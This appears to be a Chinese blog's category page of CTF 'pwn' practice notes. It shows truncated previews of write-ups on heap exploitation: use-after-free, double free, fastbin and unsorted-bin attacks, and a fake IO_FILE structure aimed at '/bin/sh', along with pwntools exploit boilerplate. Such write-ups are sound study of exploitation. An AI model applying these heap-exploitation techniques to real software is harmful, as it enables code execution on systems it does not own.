pwn刷题笔记
文章平均质量分 73
做题笔记
、皮皮鸭
这个作者很懒,什么都没留下…
展开
-
【pwn】2019Byte ctf 复现
1、mulnote看 wp 说加了 ollvm 混淆,不过影响不大,存在 uaf,libc 2.23,double free 梭了。from pwn import *import sysbinary = "./pwn"context.log_level = "debug"context.binary = binarycontext.arch = "amd64"elf = ELF(binary)local = 1if local: p = process(binary)原创 2021-07-07 20:38:18 · 509 阅读 · 2 评论 -
【pwn】0ctf2017_babyheap IO_FILE解法
libc2.24以后加入了对 vtable 的检查,这里采用 IO_str_jumps,fake_files 如下:fake_file += p64(0) + p64(0x61)fake_file += p64(0) + p64(io_list_all - 0x10)fake_file += p64(0) + p64(1)fake_file += p64(0) + p64(bin_sh)fake_file = fake_file.ljust(0xd8 + 0x20, "\x00")fake_fi原创 2021-07-06 20:42:16 · 222 阅读 · 0 评论 -
【pwn】fastbin attack
1、0ctf2017-babyheapfrom pwn import *import sysbinary = "./pwn"context.log_level = "debug"context.binary = binarycontext.arch = "amd64"elf = ELF(binary)local = 1if local: p = process(binary) libc = elf.libc # p = process(binary, env=原创 2021-07-06 17:18:46 · 208 阅读 · 0 评论 -
【pwn】2020GEEKPWN复现
参考师傅的博客,复现一手2020GEEKPWN。1、babypwn思路: 1)fb 泄漏 heap_base,通过堆溢出修改 size,释放进 ub,泄漏 libc 2)然后 ub attack,这里学到 ub attack 并不一定要分配,因为漏洞发生在解链,所以只要在 ub 中发生解链即原创 2021-07-05 19:28:02 · 446 阅读 · 0 评论